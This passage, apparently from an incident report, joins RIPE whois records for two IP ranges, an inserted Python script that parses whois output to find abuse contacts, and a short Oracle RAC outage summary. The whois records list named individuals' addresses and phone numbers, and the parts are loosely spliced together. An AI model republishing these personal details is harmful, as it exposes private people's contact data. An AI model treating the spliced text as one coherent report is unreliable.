mnt-ref: MNT-INTRM
mnt-by: MNT-INTRM
source: RIPE #Filtered

person: Alexander Ilyin
address: Communist str. 33
address: Saransk, Russia
phone: +7 8342 242276
nic-hdl: AI1814-RIPE
source: RIPE #Filtered

% Information related to '91.221.0.0/23AS51635'

route: 91.221.0.0/23
descr: route object
origin: AS51635
mnt-by: MNT-INTRM
source: RIPE #Filtered

% This query was served by the RIPE Database Query Service version 1.68.1 (WHOIS3)

188.40.17.97

% This is the RIPE Database query service.

% The objects are in RPSL format.

%

% The RIPE Database is subject to Terms and Conditions.

% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.

% To receive output for a database update, use the "-B" flag.

% Information related to '188.40.17.97 - 188.40.17.97'

% Abuse contact for '188.40.17.97 - 188.40.17.97' is '[email protected]'

inetnum: 188.40.17.97 - 188.40.17.97
netname: GOBIT-SRL
descr: Gobit S.r.l.
country: DE
admin-c: EP4807-RIPE
tech-c: EP4807-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
source: RIPE #Filtered

person: Enrica Paoletti
address: Gobit S.r.l.
address: V.le Lombardia n.30
address: 53042 Chianciano Terme (Siena)
address: ITALY
phone: +39057863007
fax-no: +39057863007
nic-hdl: EP4807-RIPE
mnt-by: HOS-GUN
source: RIPE #Filtered

% Information related to '188.40.0.0/16AS24940'

route: 188.40.0.0/16
descr: HETZNER-RZ-FKS-BLK1
origin: AS24940
org: ORG-HOA1-RIPE
mnt-by: HOS-GUN
source: RIPE #Filtered

organisation: ORG-HOA1-RIPE
org-name: Hetzner Online AG
org-type: LIR
address: Hetzner Online AG
address: Attn. Martin Hetzner
address: Stuttgarter Str. 1
address: 91710
address: Gunzenhausen
address: GERMANY
phone: +49 9831 610061
fax-no: +49 9831 610062
admin-c: TF2013-RIPE
admin-c: MF1400-RIPE
admin-c: GM834-RIPE
admin-c: HOAC1-RIPE
admin-c: MH375-RIPE
admin-c: SK8441-RIPE
admin-c: SK2374-RIPE
mnt-ref: HOS-GUN
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
abuse-c: HOAC1-RIPE
source: RIPE #Filtered

% This query was served by the RIPE Database Query Service version 1.68.1 (WHOIS3)
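The whois records above are what the report relies on to attribute the source addresses and to find whom to notify. As an added example (not part of the original GARS report), the following Python script parses RIPE/APNIC RPSL output into objects, picks the inetnum and route objects covering each queried IP, verifies that they actually cover it, and extracts the fields an incident responder puts in the abuse notification: netname, country, origin AS and abuse contact (taken, in order of preference, from the RIPE "% Abuse contact" comment, an abuse-mailbox attribute, or a remarks line naming a mailbox). The whois text embedded in SAMPLE_WHOIS is constructed from the objects shown above for 91.221.0.124 and 188.40.17.97; the abuse mailbox is an example.net placeholder because the page's addresses are not legible.

```python
"""Parse RPSL whois output and summarise the allocation covering an IP.

Added example for the IP-attribution step of this report; not the report's
own tooling. SAMPLE_WHOIS is constructed from the objects shown on the page,
with the abuse mailbox replaced by an example.net placeholder.
"""
import ipaddress
import re

# Constructed sample, condensed from the RIPE objects shown above.
SAMPLE_WHOIS = {
    "91.221.0.124": """\
% This is the RIPE Database query service.
% Information related to '91.221.0.0 - 91.221.1.255'

inetnum:        91.221.0.0 - 91.221.1.255
netname:        E-MORDOVIA
descr:          SUE of RM "SPC of Informatization and New Technologies"
country:        RU
org:            ORG-SIaN1-RIPE
status:         ASSIGNED PI
source:         RIPE #Filtered

person:         Alexander Ilyin
address:        Communist str. 33
address:        Saransk, Russia
nic-hdl:        AI1814-RIPE
source:         RIPE #Filtered

% Information related to '91.221.0.0/23AS51635'

route:          91.221.0.0/23
descr:          route object
origin:         AS51635
source:         RIPE #Filtered
""",
    "188.40.17.97": """\
% Information related to '188.40.17.97 - 188.40.17.97'
% Abuse contact for '188.40.17.97 - 188.40.17.97' is 'abuse@example.net'

inetnum:        188.40.17.97 - 188.40.17.97
netname:        GOBIT-SRL
descr:          Gobit S.r.l.
country:        DE
status:         ASSIGNED PA
source:         RIPE #Filtered

% Information related to '188.40.0.0/16AS24940'

route:          188.40.0.0/16
descr:          HETZNER-RZ-FKS-BLK1
origin:         AS24940
org:            ORG-HOA1-RIPE
source:         RIPE #Filtered
""",
}

ABUSE_COMMENT = re.compile(r"^% Abuse contact for '.*' is '([^']+)'")
ATTR_LINE = re.compile(r"^([a-z][a-z0-9-]*):\s*(.*)$")
MAILBOX = re.compile(r"[\w.+-]+@[\w.-]+")


def parse_rpsl(text):
    """Split whois output into RPSL objects.

    Returns (objects, abuse_comment). Each object is an ordered list of
    (key, value) pairs so repeated attributes (address, admin-c, ...) survive.
    '%' lines are comments, a blank line ends an object, and a line starting
    with whitespace or '+' continues the previous attribute.
    """
    objects, current, abuse = [], [], None
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("%"):
            m = ABUSE_COMMENT.match(line)
            if m:
                abuse = m.group(1)
            continue
        if not line:
            if current:
                objects.append(current)
                current = []
            continue
        if line[0] in " \t+" and current:
            key, value = current[-1]
            current[-1] = (key, (value + " " + line.lstrip(" \t+")).strip())
            continue
        m = ATTR_LINE.match(line)
        if m:
            current.append((m.group(1), m.group(2).strip()))
    if current:
        objects.append(current)
    return objects, abuse


def first(obj, key):
    """First value of attribute `key` in an object, or None."""
    return next((v for k, v in obj if k == key), None)


def summarise(ip, text):
    """Return the attribution fields for `ip` from its whois output.

    Raises ValueError when the inetnum or route object returned does not
    cover `ip`, which catches a stale or mistyped lookup before it lands
    in a report.
    """
    addr = ipaddress.ip_address(ip)
    objects, abuse = parse_rpsl(text)
    by_type = {}
    for obj in objects:                      # object class is its first key
        by_type.setdefault(obj[0][0], obj)
    inet = by_type.get("inetnum")
    if inet is None:
        raise ValueError("no inetnum object in whois output for %s" % ip)
    lo, hi = (ipaddress.ip_address(p.strip()) for p in first(inet, "inetnum").split("-"))
    if not lo <= addr <= hi:
        raise ValueError("inetnum %s - %s does not cover %s" % (lo, hi, ip))
    origin = None
    route = by_type.get("route")
    if route is not None:
        if addr not in ipaddress.ip_network(first(route, "route"), strict=False):
            raise ValueError("route %s does not cover %s" % (first(route, "route"), ip))
        origin = first(route, "origin")
    if abuse is None:                        # fall back to abuse-mailbox attribute
        abuse = next((first(o, "abuse-mailbox") for o in objects if first(o, "abuse-mailbox")), None)
    if abuse is None:                        # then to a mailbox named in remarks
        for obj in objects:
            hits = [MAILBOX.search(v) for k, v in obj if k == "remarks"]
            found = next((h.group(0) for h in hits if h), None)
            if found:
                abuse = found
                break
    return {"ip": ip, "inetnum": first(inet, "inetnum"), "netname": first(inet, "netname"),
            "country": first(inet, "country"), "descr": first(inet, "descr"),
            "origin": origin, "abuse": abuse}


if __name__ == "__main__":
    for ip, text in SAMPLE_WHOIS.items():
        s = summarise(ip, text)
        print("%-15s %-30s %-12s %s %-8s abuse=%s" % (
            s["ip"], s["inetnum"], s["netname"], s["country"], s["origin"], s["abuse"]))
```

Feed it real output by piping `whois -h whois.ripe.net <ip>` (or whois.apnic.net) into `summarise`; because the coverage check raises rather than silently returning the wrong netblock, a typo in the IP list cannot produce a plausible-looking but wrong attribution line.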


Cleanup was carried out because of the locking and queueing generated by the processes mentioned. After that, additional work on node 2 was required to resolve the problem that was preventing it from accepting application sessions. Once this was resolved, the application operated correctly.

IMPROVEMENT ACTIONS

Testing in a controlled environment with vendor support is required: it was found that when an event impairs the normal operation of any one of the three database nodes, the application loses its connection entirely and the service is completely affected. This is not expected behaviour, since an Oracle RAC is in place.

Current Status: Resolved

Event Handled by: ETB - INTEK

Engineer Sign-off (VoBo): Luis E. Muñoz.

Availability:

In the ETB culture, we understand our customers' needs and offer them comprehensive solutions, seeking long-term relationships!